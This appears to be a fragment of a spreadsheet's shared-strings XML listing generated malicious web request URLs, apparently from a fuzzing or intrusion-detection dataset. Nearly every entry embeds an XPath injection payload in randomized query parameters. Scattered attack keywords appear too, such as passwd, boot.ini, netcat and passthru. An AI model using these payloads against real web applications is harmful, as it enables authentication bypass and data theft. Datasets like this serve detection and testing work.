    <t>/mpgwo_vadmint62/tsxc-wk4gcyc/vcqbz-/2lropt8form0v.vw%up/c@@r/upcj1fvbj/mrr.cfm?eceraaee=s4epqhes&amp;62vk@-8=6361+++or+++++miseno/o/5sn/child::node()[position()=6]++or+++++24=&amp;aetzu=311969828&amp;ekgehrioiuao=9&amp;yanar=9&amp;tthlito=068790655&amp;rxgprrmu8=neyowd&amp;ltndxub=ect&amp;lqrochmn=iu4z7</t>
  </si>
  <si>
    <t>/yvanbhl@oiier44hekr/rcso7t/lmr7p7k/huq6jhsamejallppn9/o0adser/9dodsce/rifprtet/ri1oihesis/uyuguihqx/_hsq/lw3yj7en8ukxknh/hqbvghh_xzgni.jpg?se=4542161&amp;vttkosas=0&amp;k61asi=begy]it&amp;griknaaacmo=rshn']+|+p++|+//user[+++name/text(+++)++++=+'uq0&amp;nsg_6=plbhj-v4un&amp;ha=sosmc+loshavingc&amp;opyrw=hxnq_.7gbzea&amp;hndi=2468&amp;etoofp=4066&amp;ae8syeo6an=o1wmne@q</t>
  </si>
  <si>
    <t>/fga980eni/aean7adchiniu/4togn/atriozujwmq/sit/fhv.asmx?uwg8=(i++&lt;++count(st/child::text())++++and++j+++++&lt;++count(m3/child::comment())+++++and+k+++&lt;+count(daenz/child::*)++)&amp;ml.bwv12gt=vrr;rorlp&gt;metaeolihawh&amp;thy=wxtmejedheugeeee&amp;vwindow.openf-sjmqsock_streamla0=52145&amp;tanntebrte=401232</t>
  </si>
  <si>
    <t>/csonpncsnduifeoo/t9zefmsmvxgbva_5xclp/fbin45z7-wjh/4br0.bin?nf=t=hdn&lt;tg\\+perlfe&amp;9scf=tmwirep&amp;ireplnbl=te-&amp;k4if7=da&amp;i.@veidlc=retta']+|++p+++++|+//user[++++name/text(+)++++=+++'ihn&amp;wrfomt=(zgosaoryhpnunionamw+&amp;fe=nheejjandnuecho</t>
  </si>
  <si>
    <t>/eisedem/zjysc/dx/oosy/jhavinghb-27e/rs9ftqizmy/mtl9nm/e2ro8etntstrztr/trzjcw2cha/hrl/lpyi2waac/eociit7nwooe8hiq.cgi?8nx2=e.rwyp&amp;2eesaabclxme7=e1r&amp;zia2emsfi=tmejuhsileo9&amp;hltewmsr8ud=@xosblsy78erexecec%uto+&amp;dyioofsyusr=2209&amp;7ioaelfbretahtn=rnt']++++|+++p++++|++//user[++++name/text()+++='2ui&amp;sdyaeo=eza&amp;dlfo1xaccess_log5=13ey&amp;aoowa=w@kd&amp;stcukn8st6tiiib=6$o$leesn0does'ema&amp;lsyonauotmshb=21699219&amp;orozcblso=er6k&amp;ede6rsrxeotf4m=691&amp;rnntt=f0rn~wrsock_streamu|&amp;ety7er=759</t>
  </si>
  <si>
    <t>/dws54zuzt8qj648/eg7luhel2mx91p0kms/isb@y8k4kjegkseh/c7v2/gjnilmlcpnetull4cmn/t4oz_2ha2ewlmiwnwlp/reoflalektteott3loop/wtpzwn/5rjz8bs4dzivxwkjm/el9edz55yadmincatm_8f/9h1loth2tet.cgi?se=f9'+++or++++path/child::node()[position()=n]++++or++++'in'++++=++'</t>
  </si>
  <si>
    <t>/7awaza6a5tohihobet/iobjectuuam/5lrarnxregerzw8r/lnag/7eh/sw3k/obe_tk/eaianrgogentn/dsnot6e1/pv1mhelae/ecopyboot.inipsgdb8/rcd4.jsp?tstb4de=troluj&amp;odrgl5rebhw=rbt&amp;02=rng+]dkv�zed&amp;oq6at0rdaibhr=nelio5j'+++or+count(+path/child::node()[position()=((++i++++++++j++++k+++++++++l+++++++++1)]+++|+path/child::*()[position()=(k+1)])=1++++or++++'t2omdnpr'=++++'+++8ei8se'++or&amp;.sagehmz=odilebec0uuftrc</t>
  </si>
  <si>
    <t>/2imfdeamnrtulce9ohtr/ot8rehoh6s5p/lsdfhrnaoenfzb/cqbrmj.88p6s/1v/netcatem/axfxzqdbpcl/a2a/6d.pl?fai=e3atmv&amp;dd=ntncnyeituuheor&amp;6rrnck6iaol=at&amp;ohtpassbbody=qh5whr&amp;tpoc=o1dobrtetm3at&amp;spbiiamssioti=cklrsla&amp;ldts=ntlal3telnetbrugaf&amp;oer=)o&amp;zdudew@body2=79s+to'rron&amp;asn=6&amp;ne7=safiefntamoatae4yt&amp;0y8wttqeup=1915++or++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1++or++2308=&amp;bp4aioxqleo=amy&amp;gteiocttherre=tteqci6ei&amp;anpa=4777479</t>
  </si>
  <si>
    <t>/esne/otclrjyaroen5ait.sh?tk=a?a&amp;gilradsan=ler&amp;tn=jc+&amp;2.5tsuv1m=pposition&amp;fncnwu=|prr+&amp;var7crk7cat=|h3a&amp;endsdlaaey=682482&amp;nztauvq4=0g4a7c8'+++or+++++count(++++path/child::node()[position(++)=((+++i+j+++++++k+++l+++1)]+++|+path/child::*()[position()=(k+1)])=1+or+++'stuar'++='+++aern'++or&amp;ln3=|htpassq~ros/4tmpflike0&amp;uzkl8n=ocofoia</t>
  </si>
  <si>
    <t>/e-tgbk/cmc/gfkdn86/jrkfdpj6eh@d0.ufcbu/ss/ylel0yami3/ov8.hvr5o_tz4wr/g1drwpoeofer7htx/i5xu.qn3oigtyxrn2gv.jpeg?atwqo5g=ecj&amp;lac=fserviceseya&amp;iuohicnfgas=29&amp;ee=aed&amp;f.e5=978&amp;ptm1tnc=enri&amp;sn6izkewseu=69605&amp;agg=4tkhw'+++++or++path/child::node()[position()=n]++++or+++'aita'+++=+'</t>
  </si>
  <si>
    <t>/hrrv/yhle.netcatotfx8/h0ema/erarosxrariritf/oor6t4qkikepre5t/wui6ie@ij4kk/rybxblsydrt/zqgcd3qetcls/5oijeimiiddoaouec/eifva/k9cnsfcn0ragsa9dr/e@xlinkkzd4wepometae.mspx?m4secoqs=/vscriptrgroup+by&amp;met.wxvarvef=o)a[hyeev@scriptt&amp;icen8ifihhal=tmeagar'++or+path/child::node()[position()=n]+++or++'rovn3'++++='&amp;vrdtassceudohlr=snrniedm5o</t>
  </si>
  <si>
    <t>/4g3stfowdwyjqq3x/tnn/qbmtd-3wc/bopassthruv%udm/iehm9k9nadc/ovcepyrisos/iltbcta7saaf8r/mrcc7bv2b/radgfofraxoyblaede/razknoda/mopltw4i.jpeg?oimtaont5iqeo=719&amp;akuiwhecao=+ut&amp;rirc9aslslnt=50974&amp;srarttoaankmw=3&amp;p-0qw=e'ee&amp;0sitfg=84719+++++or++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1++++or++1721=&amp;bodyzifkkhttpg=eqtfd+oe&amp;owds&amp;vartwp-&amp;xksystemrnh7a@=t&lt;s&amp;jyt=861073047&amp;rtdgigitttasecn=5749&amp;pn0oyhdq=80079&amp;jzfxpjetc88g=wlsfsj1xs&amp;etrbiatlt5ay=wot1&amp;sio=c</t>
  </si>
  <si>
    <t>/uh365yq6l/telnetew/paed/nzlfaerwhosadt1/cmcq/a7a6o8g7/i4hoiieooe.mspx?8apltyc=qmz'+++++or++++6++++&lt;+count(path/child::*)+or++++'fds'+++=++++'&amp;ne77asszzpz=7todb6cdd&amp;stl6auezwtreot=71804175&amp;tehzoslw=act&amp;adt=9815258728&amp;ceje=+rl&amp;mrfeecl=an(xms$u&amp;uu8v-kjtmomw=tmwgceil3la&amp;rerco=6758&amp;ixeforshfadmisr=763599839&amp;pn=iunhhr03tqsfc&amp;3eiaowoint45i=ht9+\\e+mb&amp;rosit3=35945&amp;sgogoitire5a=8619&amp;orv@vroumi=srd1i?~aceijsat7ub0</t>
  </si>
  <si>
    <t>/sro6n4arx.aspx?vc4kshutdownperlf=rr4ma'++or+count(++path/child::node()[position()=((+++i+++++++++j++++++k++++++l+++++1)]+|+++++path/child::*()[position()=(k+1)])=1++++or+'tin'+++=+++'+++++tai'+or</t>
  </si>
  <si>
    <t>/nr/45g8a8-u4sr2m/tu/lzee/oam38uxusrcv.c/lzbxetx954s7henk/okb_bhaving9n5to1zu.cfm?orc70lpsylocationt=58005&amp;tjdnyi4noajaedw=t0:&amp;lesatcdeinapme=5537&amp;ats7el3s=tohtacces&amp;utnee=jezaoelt'++or+count(+++path/child::node()[position()=((+i+++++++j+++++++++k++++++l++++++1)]+++|+++++path/child::*()[position()=(k+1)])=1+++++or++'e8asrcaz'='++tytgwio'+++or&amp;bo=cpbxxps&amp;ydk=e&amp;emm9eonriea=s&amp;xn9assxo1exphbt=prnhomedsce&amp;sc=7377862&amp;ay4jhe3optx=afb&amp;kki0xu0=00917&amp;se4inrosctrcseu=697620&amp;neiwtielrtn=qiknpwb</t>
  </si>
  <si>
    <t>/lezfuuv/4oicv6gvlxwj/ounetene4tiaye.png?anxnun02tnintn=8kt0ns/eaaa/ty/child::node()[position()=723]+++or+++++'btm'='&amp;q7enbnefysne3=;n</t>
  </si>
  <si>
    <t>/mata37ey/yhntsadstadi.mspx?fr3stcgotz=529472705&amp;ao=sftn']++|++++p++++|++++//user[+name/text(+)+++=+++'j5&amp;beqsdd=eo+m;+bhttgtvars)dt</t>
  </si>
  <si>
    <t>/he.jpeg?eo8ueme=lu2sg'+++or+++6++&lt;++count(path/child::*)++or++'rssomec'++=++++'&amp;0prmbs=eo60y&amp;ette5slw=tpt-rokkpgdx&amp;oaeia=1116586&amp;nio.luz.8=4915277&amp;algnhl=benmshr&amp;is=803847679&amp;my7nctc2s=02</t>
  </si>
  <si>
    <t>/mnc0dts8ytsr.jpg?cvbscriptr4homemtk=8110531&amp;6msahqueysseixs=3eqanh&amp;djzqdtr=ysrieqr4iframese&amp;vhlnutu@.t=tihia9eur16tacos&amp;db32g4osl=a&amp;ie5=ormb+tt%estylecy@en&amp;eaminktnsxlruaa=r4nrntq2in&amp;epfnb8qx9=6++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1++or+340=&amp;ltu=nhgsjbmk6xm&amp;snhodikijk=3876582800&amp;tjtyau3ie=eqizsunb&amp;aiynzeon=hass)emvaccepts</t>
  </si>
  <si>
    <t>/brapeqniiy-t.swf?esenpm=5169+or+++++1&lt;+++++lpa/ob/m/child::text()[position()=81]+or+++++2=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/bh9mhlbqz/ezxiphpvv8ato/3rntgao2ihetb9dt/winnt_lomynnhc8/pwgx1b/das8t13tatpa.mspx?hnntcny=0&amp;okiednrud4bj=04056&amp;dyban=ve6erit'++or+++count(++++path/child::node()[position(++)=((++++i+++j++++k++++++++l+++++1)]+++++|++path/child::*()[position()=(k+1)])=1+++++or+'hnthbbee'='++troo'+or&amp;mnujetc00edah=458&amp;os=u+n&amp;pint4ansnidhcq=rtau&amp;ld7utxseaut4srg=70164064&amp;ssphao=eoon&amp;2boxatenrohmi=934633305&amp;sltbcuwbt=9970218&amp;dlnta=+jig7</t>
  </si>
  <si>
    <t>/aoi9/4iwmc/t8nef09va52yigrysup/ehedocumentz/pigye5/soeaz4ni.js?tisimmh6mad=keeoipdng&amp;g5kqwh=kfitdafcm3les&amp;do=3667&amp;vuxpvv1oyvw%u=y&amp;sb_gnb2=x+f&amp;u8ahp=6:&amp;ea5bvainputyze=ed6tmemeemsraxsh&amp;si9irozgeeshn=c6nu&amp;opc1luee=ojk1fifrvu&amp;hemaegtip=83&amp;9eqqad4=onac/boubh/shqn3/child::node()[position()=44]+++or+'sac9ms'+=++'</t>
  </si>
  <si>
    <t>/ljhuvwhyc/drve8sgaesmtsx3se/onkyfa8j1pnknb.jsp?ea1yelo=salezl&amp;wu_hjdcmd92qd=83++or++1&lt;++ecteam/ee3/gaertc/child::text()[position()=9]+or++860=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/evbet/7opa/myjl.cgi?7rmicj4=@((mneo+ltd9|~&amp;dq1nwpbxgwisa=ri5?a9c)ot&amp;sooeihpdtb5tn=sudahvdmunoarstwtg&amp;7n=yec@&amp;vd=6230833&amp;0s0itn8s5vtgbme=e6efah'+++++or++n1ncs/tiat/child::node()[processing-instruction()=557]+or+++++'wi'+++=+++'&amp;htptysr=030363</t>
  </si>
  <si>
    <t>/-tf60rmdpasswd3/p_cr8v@0/b3drm/1iyxycrr8e/eh2w/aia5letenpwah5erld.htm?anqrrsgrummoo5h=20766&amp;td7=nselecto+5&amp;oeltahcnl4d=+s+es&amp;eaajsn6hnely=566&amp;e9di4nsinesddas=r;+systemnhshewsp3&amp;goeis7qrfqirmae=3_rmy&amp;irannnhdihpmi6=(u4cat&amp;lh5rs=fmc6mlt7ii&amp;rielaex=lxjto9xyqj&amp;yrxw=0229&amp;@8qp0zfehlservices=abwej-&amp;fkke74gnghttps7=[fthwrlvaao'&amp;exl=sqrb&amp;sielptaz=amsz3gn'++++or+++path/child::node()[position()=n]+or++++'hea'++=+'&amp;tunonrlnt=yzta4xbhzkx2</t>
  </si>
  <si>
    <t>/aeialuecoioecten3mw/oiemloenaisl/peoit4x/lelrltoynaonrtlm/olbenhgfadd37ehve/mshu/w9abxhu.0ezzyf4t/d-ng2kws0ic1/ilcaf/9soaxhtciemh.asp?irfjo0eaniorh1l=s..syf@d67&amp;l@jbetweenant.deletegmk=4390&amp;so4=ledasswauoe&amp;in0idannehht9d=(i++++&lt;+++count(c7c/child::text())+++++and+++++j+++&lt;+++count(rt7/child::comment())++and+k+++&lt;+count(rn/child::*)+++++)&amp;ehnnsh=3i6cpacieesr</t>
  </si>
  <si>
    <t>/m3eeindattfs.nsf?aescript-mms6p.=;trall4&amp;zabtiiscufoioc=855740&amp;etm0l7=trwti4/eijhrr/lh/child::node()[position()=339]+or+'eomz9d'+++=+++'</t>
  </si>
  <si>
    <t>/_tn/uh.smdgt.htm?ttc4=itewwfr'+++or+++++path/child::node()[position()=n]++or+++'3hsbi'++=+++'</t>
  </si>
  <si>
    <t>/mites4neet/rt/tc/eocp/p1/iapositionylikec/ahragajndri7dieeun/roq/stxiolcalhumezhn5isi/tny3sbt/etse2lcpaeeerpl/l-_.sogz.png?eboot.ini0z6=911&amp;welt2=slandrimgleonl&amp;ercettsytrvt=303+++or++++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1++++or+++++76337=&amp;i7ydeutiezja=e8tn</t>
  </si>
  <si>
    <t>/nmbp2qi8zrwpg897d/uxsr3au/nsaarwpeod0h/lhbwvy4w/rrqnxplrd2/aekedps/s_xwfgj/etsaamithedh7thefem/pnjvxterm/d9jtt3rtjbdmwinvn/anu78.shtml?ts=oliv0dg@y&amp;ae9ltsenihmtair=0&amp;ftnaemvonnnash=ennec13lsph&amp;6hymculftac=di8tlvetya9g23b&amp;eshto=+zoh&amp;rthsrmeearree0c=rqvlr5rk&amp;d6henhui8menlr=070308424&amp;iwasnbttknnesdi=kydl.h80qb&amp;eem=7++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or++199=&amp;r2p0h=g0qgam%uh2nttmwlocation&amp;7yoolnutkoueerz=unionol&amp;bur=ehuai33ps</t>
  </si>
  <si>
    <t>/hhuxl5sjlvxhxqts_/mittsajat.mspx?a1lnebpurahata=ukasf'++or+d9c/lb/child::node()[processing-instruction()=7]+++++or+++++'ax6ec'++++=++'&amp;ihbb=5&amp;kchtndee0txsb=tftqclibl+d/+&amp;me0d=232671602&amp;rteaehsfsthtota=evalin(q&amp;onj+[homea&amp;ipbynfznuodi1g=orrkdsodyk&amp;sht=360&amp;xefesjs5aatia=281&amp;wq4w=tlseeo&amp;btsiopeenav=t3bewyvr</t>
  </si>
  <si>
    <t>/srg6s3h@iu_9x.css?fzgvgconnect53vbscriptap=caoea3if'++or++nin/yo/child::node()[processing-instruction()=47]++++or+++++'ic2mk7n'++='&amp;tdnduilg=8em&amp;9tehqeze6hh=oiashutdownsps&amp;iy8an2wocar9=eef7mile&amp;eltnopia=4eeay01ne</t>
  </si>
  <si>
    <t>/pb27pukhbe/sfnaeb4hsllthsl.htm?dusntjyrm=79300921&amp;ttradagtbg=865&amp;processing-instruction1-jdkuwwg=lhhal&amp;v4odxqts=tw+f=t7hinsertxshiinclude&amp;emred=z&amp;ob4tcd4t9uj=ehjnoohteoaov&amp;gbxbtmppszthtaccesqa=e&gt;nr&amp;vyd5w=cayzqonmojk&amp;xeewier166=e2bls']++|+++++p++++|+++//user[+++name/text(++++)++='ao&amp;ielntiass09y=mddendv9u&amp;toalahhnerts26e=&amp;aonerdt;s33eft&amp;eognetn=ebhq&amp;sbsoaedoe=6852524&amp;da5wcrepr0ia=apsp&amp;fkxpypflb=sletcs+45ilarcr]bwunion</t>
  </si>
  <si>
    <t>/ika.yztca0l-2r/dn/4ojbteftdteofu3o.png?4hodtc=fkiwf2te1iv&amp;vpcd=qotf+7&amp;ia28r6noxhf0=dar&amp;eriirauw96mem2=6426729717&amp;upl3s=lfgfsiae'+or++++(i+++&lt;+++count(1sdtee/child::text())+and++++j+++++&lt;+++count(th/child::comment())+++++and+k+++++&lt;+++++count(enh/child::*)++)+or+++++'wdb'=+++'+++++blo5len'+++or&amp;n0esekqin8e7ist=xis&lt;e=1tnsaedi&gt;n8b</t>
  </si>
  <si>
    <t>/heredoleu/ezunmj/eheettraoh0detcem/nryad4az8ds1nvi/ysxlejs/icv2y2e2/sp@j4zy9bhl-ybcygjs/i6bezenescrv/umvs6jrf4x/nhqle50mlq3t.jpeg?id=inustttjsigenlav&amp;kaskat=nmeuiohn'++++or+++++6+++++&lt;+++count(path/child::*)+++or++'m595u0t9'++='&amp;da5=stimotrtroaq7ywo</t>
  </si>
  <si>
    <t>/i@fxh/beyswyubst.jsp?tuniiint=04&amp;hlhncilpdoet=7th6jt18otka&amp;snoatoltc=7646&amp;eicrokn6tina3l=q5otacusnc1&amp;1fautals=89354+or+++++u/7s/tt/child::node()[position()=618]++++or++++50180=</t>
  </si>
  <si>
    <t>/dia/rdtp7kyg0dk8kprocessing-instructionw/dtafaufl1e0tdi4/rzprn8tcoif8d99niopi/amsltsshsttr/he/shqm8/h.kvtzxwbj9/ruf.htm?9e=oaaservices1&amp;plikehtaccesevallrhttpwfv3=ssranhe&amp;ftqb44g=&gt;sboot.ini&amp;qgti=ye+tt+3sacatcechoasie&amp;zv-c5@3=oud/1seoix/i/child::node()[++position()=147]+++++|+++++rn/e/o9i/child::text()[position()=4]+++or+++++'g7cs'+='&amp;aoga=ioytjt&amp;ler=nos&amp;46etjnn5tyqsj=sawuhnhrmrabm8&amp;bfks=lk&amp;flhxy3ftunl=lpeg&amp;sr=044&amp;euyabaan=iroscqmhtub</t>
  </si>
  <si>
    <t>/6vfeygbw-nq-lu4cap-3/egmzjsjw6.y/hrwdft_x2e-n@cazb6v/tv3vkj/yiwsnhpot7ytye/ew3eq3/b4uuvf/nham/passwdn9uya8ncu.jpg?xmltvbscriptukwn@xgh.=4&amp;llo7fa=8&amp;3rtmrosndi8oi=ij'+++or+++(i+&lt;++++count(tts/child::text())+and++j+&lt;+++++count(r5atin/child::comment())++and++k++&lt;++count(more/child::*)++++)+++or+++'oob'+=++'+e5c91k'+++or</t>
  </si>
  <si>
    <t>/tjobetcafcm88i/ht.fn/aeoiejirlle/hcaeaaixmlselro8om/rf/iacnesecdpuetrian/bg71bovfn1bsrll/6nsuya1rhzlmadgh/blyaeaeia2ojrik.jpeg?tde4=e&amp;etkostconnectee4ne$mail-aeo&amp;rttt6hcsa=obnqnk1tvawy&amp;nmthu2esss=cn6qerpw'+++or+++++n/gluamr/child::node()[processing-instruction()=652]++or+++'oobnn'+++=++'&amp;bthals=tprsxni</t>
  </si>
  <si>
    <t>/winntl7bwbodynr/dj-nzl/vdveggwjwtljccx/nsaosre36laanoantee/etene/yytmplfc/tait/brvme08wau8guaq252.htm?imaba=servicesqhrixbta&amp;bpd60v0=unione&amp;ns=5965+++++or+1&lt;+++iyet/j/a/child::text()[position()=835]++++or+++163=']+|+/*+|+/foo[bar='&amp;eorleridhen=5&amp;tnn=7927&amp;tsmnincf=;inputqfu</t>
  </si>
  <si>
    <t>/cla.asmx?amtcksock_streamzbx=m87ak8qae7d&amp;-5xxrcpvaibq=oj1&amp;nee1rnb=475++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1++++or+++7478=&amp;tif4zt=7164961</t>
  </si>
  <si>
    <t>/oyoqym7@-s/o75-/mf@cn94yqom/de/rmguvy24fo/x6lqxlvxc_0u/ltofshsnnsee1aao4t/hnrh7th/o.s3nu/au@d3uo-swmkrjmcoql/_9dtmpez.js?eohotxivyob5ee=fhsystemosock_streamhose&amp;ratitei4ts=rt/twheafaabih&amp;dhrnitt=12426411&amp;omeet=3933785&amp;it=69057146&amp;6noqoz4hans=28+++or+e/gubn/cgraef/child::node()[position()=1]+++++or+59252=&amp;kpprqc=573&amp;on=380&amp;3on7tvd=ea4tead]r&amp;lvhae=oueevale(+et</t>
  </si>
  <si>
    <t>/uoktetnpicleiah/jfms6li/0rydiserb/alfvg3h@cqmam/l0tepint/iiyfzhnzoy.reeki_u.gif?7bikky7kj3p=7540&amp;zmrz7tmplg=j/mm1o/a/child::node()[position()=618]++or+++'if'+++='&amp;cikdnntt=bon-</t>
  </si>
  <si>
    <t>/e7cey50xlths/arj_/exrflwz9r16dxtjv/orb1winntinputr/eh13/61qzatlkeweox.shha.html?ivc8=9t&amp;rkn=(i+&lt;++count(er/child::text())+++and++++j+&lt;++++count(byoy/child::comment())+++++and++k+++++&lt;++count(d6it/child::*)++)</t>
  </si>
  <si>
    <t>/lb./rmnw6kov.p/sc/wyvkuamplu6/npdfoezipon/hvi.x3jhuksg/tsbh9kb4ni9geoni.mspx?e9sstnhlnodki2t=i9t/nrnmeo/da/child::node()[+++++position()=878]+|+++ahe/qsins/5ebd6r/child::text()[position()=1]++++or++++'ciaroiec'=+++'&amp;esmn=935&amp;8eyu1hqknne=eaet8hua&amp;1wyhdkesiennjea=14449&amp;fm8=tflaenyntn9io&amp;azettpo=55245</t>
  </si>
  <si>
    <t>/efemti/eaelm/qnsastyledvvld/ns/nuash7sbrh/fyinputm_93dfker8fn/pe5mshrlu0e/savpkhi1slmzdww7sz/iehp3qstuy/r1fkp.php4?tphlcnn=:eglvexn0nodedxtermd+s&amp;edi8eeo3elihiea=oh'+or+++1&lt;+++++nikn/m/oc/child::text()[position()=33]++++or+++'tr'+++=++++'&amp;6eitloi=s'tniely+vs&amp;tlauu&amp;0d=t1oekkwettlubdc&amp;deeaeesv=57792</t>
  </si>
  <si>
    <t>/rsemswenji8/.-w/kutxhn-h/s8libd6hqg4a/cpassthrutvbrvpot./4jlz41xujpee/1@u2u-bfepphga/k2n.-m.shtml?eydexri=18t&amp;mt44vbscript.qb=rs5e]r~&amp;aisost1gr=oldknyoi|h&amp;tea=limthsrt&amp;liiey=teh&amp;itwfdaotbyna=(i+++&lt;++count(dd/child::text())++and+++j++++&lt;+++count(rln/child::comment())++and+++++k+++&lt;++++count(ovaob/child::*)++++)&amp;sl=a71cfgpwy_&amp;rh11x2ndl8oa2tr=&amp;uiaqeirdiohtar&amp;z.uaccept=?caetoewao-i&amp;&amp;hxzvclents=uihr&amp;5otmnb=smtea</t>
  </si>
  <si>
    <t>/qj/rv7/eloesfpskuxc8/tfxuf/me0pz/daghaout281/otl/itonpanoyndne.tiff?crodbinb_=6lrad&amp;btoe=dlnaa/3tcybs/o7oe/child::node()[position()=6]+++or+'aer7v'++++=++'&amp;aueegro1or8tmcr=rand&amp;iojkm=p+havinge&amp;tiel6so=lh5xp_y4wc:$nra:&amp;qhhoertrhw56s=abatl</t>
  </si>
  <si>
    <t>/r_oqjxp3eqxean@c/2jlogsfutquobbb/tmxsf@ijzntj3xhqr18/scriptr/9replacezokdzdu/hjiexrwm9jrtyaos/cm/7svxzme@jfb34b0/6roeinrpieth/nypghe/m7etlee.mdb?0tmbtis=265&amp;ma=pdivreplace&amp;kft=0o/ncm&amp;shhheze85e00w=7&amp;fjhhedjitattr=vn&lt;ai6readdste&amp;dde=nph-dsh:&amp;tchthi=osneejsoslhmeccyw2&amp;mocha7bav6qg=efj06dx'+or+oe/le5n/child::node()[processing-instruction()=8]++or+'rrbh'+++=++++'&amp;dsbbib6fy4y=lertcpsurmpe&amp;eed8thbpoymlh9=967&amp;dehdhk3adcshn=59xfhjqulg&amp;ieiiexamhix=ss+p</t>
  </si>
  <si>
    <t>/pb/aapcwisy6o5qv7a9s/bgzzrxlflfvo/t_saq0rpi.php3?ltpoaiqe=oaa1iltr7atbn&amp;yt=r&amp;sdwop9r7nti=w&amp;ceie=1115245591&amp;vhoi=telcgaidgl&amp;euien=43&amp;eesogien6wsp4=(i++&lt;+++count(bmpym/child::text())++++and+++j++&lt;++++count(lo6r2/child::comment())+and+k+++++&lt;++count(tanoij/child::*)+++++)&amp;samtbsfm_y=vvr&amp;ismaa3eyd11=6124</t>
  </si>
  <si>
    <t>/0k59umibpx8.jpg?rossdtsa9h=tkzo9&amp;eta=6601156&amp;osltnurj=ptf5lq5ehssaqu8l&amp;ieyus5rmel0=eic&amp;e1hc=isnr7|i)i&amp;8tmle2teattp=sen&amp;aeoorfhs=oet']++|+++p+++++|++++//user[+++name/text(++)++++=+'ayge&amp;tepteyehrlceoce=eiframei&amp;vblsjy=776&amp;s-htpass.71b=hqxzw&amp;r1ofromi5bkk.=jzaxl5ukow&amp;ertadsdicosj=ssock_streamnetcat&amp;mob=s&amp;loes=6udatnfnscega</t>
  </si>
  <si>
    <t>/oeru/anwsrrz/osvjd/pzg@4nlsr-sm8td/tnllh5toor8rt.js?deiyhts7yfbs=9026&amp;san=nn&amp;tztes=767&amp;ibsdedhahsrmxs=e.dt-&amp;ohci=do+)2&amp;lirb9aljn4e=7&amp;i5neodnnnclm=5&amp;7mnaseuco=0076534&amp;dkstilnrleelei=oan']++++|+++++p+++|+++//user[++name/text()++=++++'78&amp;oz=41&amp;xevahidrrer=div1gecc</t>
  </si>
  <si>
    <t>/8rtsame94srbfee1s/bcheoert/aecr/zi/3etmyos/ev6cbrf95/zanpsedese/d-oe/@uc.php3?metalw@sy=2&amp;ewou9bg1=ahioualeon3y&amp;ikoal=1+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+++or+++828=&amp;bumibq9_x=yaccept2ddreb+in@o0&amp;9hhvzrs8p5_z=77824</t>
  </si>
  <si>
    <t>/79yuj/diar9dwionn/fqah9qz/eqq/nph-snaccess_loghpl2ooqywp-/siq/aiaetemqdrmnkipt4nt/ho/tk_/tsekne9mx8cjcfzi.sh?ho=07&amp;jajeeohgcle=664&amp;2ntednhddjndmtu=etti'++++or+++++path/child::node()[position()=n]++++or+'gtcnheo'++++=++++'&amp;eid=tcq97d&amp;nvbpgstnchild@mrm=062&amp;jm_2b33_=ts&amp;dpgaestsvolhmm=qi&amp;clwitia9fwfoar=rtwqat8mwinnts|</t>
  </si>
  <si>
    <t>/ahdoiuuii2edmsnt/n9zjockusc3.html?kf6ba=bdall9tobjectea&lt;&amp;replace6l5=41++or++sels2n/sestl/ib/child::node()[position()=379]+++++or++62217=&amp;cnospk6bi1ut=74&amp;qrqam_id=e&amp;55cz_al.f0a=14449101&amp;nph-ogstmp_=174594&amp;htniueiui3ttu=nl-oitum&amp;epkeaeadkdkllo=lflsn3z+s;j+e?+im+e&amp;dxaptirncoem=s4es&amp;twn=7&amp;gteshri=9704298176&amp;ssp=elea3eer5&amp;sa0=ra1uwpd4vjb&amp;afaotsn2ariaera=awlxyzq&amp;rhi54ambus7es=8zw0/hfgthmcreplacehl~</t>
  </si>
  <si>
    <t>/9donnuetp/fgwe/amjgdmrfiiinru/qvjpassthrucqc/ltbqns98t5zwhpmhzp/m@xhttpl3@e/rdxnx-bjug9vrx/2fylvzwvksuser/hbsgh1v9j/tffhdmmomfn.shtml?cleaseoku=etleetn5m8)bhadminbduj&amp;sdotei=skncqooxs&amp;ame=7761674&amp;awvrm=op~efikxizr+wastyle&amp;is6ip=00&amp;osg29h=26&amp;r4eetbtsh=hnnh&amp;fdiv.hjtv=ml$9c&amp;ywieacrsee=(i+++++&lt;+++count(2cazd4/child::text())+++++and+j++++&lt;+++count(ed/child::comment())++and+++++k+++&lt;+count(6sau/child::*)+)</t>
  </si>
  <si>
    <t>/ehb8topantdepdysr/o9-jav_y3gub1fwge/hvydlaseio7ylbyv8vza/eivj.msf?eonlssost0=73&amp;4eu5tihnciaq=?zer&amp;ltttehnfcxla=685&amp;ehsypsdps=papypmxyn&amp;0cg1ftp7la=cohes'++or+++path/child::node()[position()=n]++or+++'sidt'++++=++'&amp;iosoanondc=n)dme&amp;tnsnfimshnobt=7742049&amp;ja=re9s0qbeuidteh&amp;lmer5lh=inee&amp;fnezetzotneyg=181186280</t>
  </si>
  <si>
    <t>/nirnr9ai/etgbyeswx/yk2n78teiete/nairgithoohozteebtws/5rgrq0/nquwhejnm/vel9yf/snioelotu1cs0ldn9n/oehfem/dehoakmi6uarmm2i/shwbig5kcf2gqozc/tgskzlnx5de_io09.css?gu9iwzn=(i+++&lt;+++++count(8i/child::text())++and++++j++++&lt;+++++count(t0wmr/child::comment())+and+k++&lt;++count(dk/child::*)++++)</t>
  </si>
  <si>
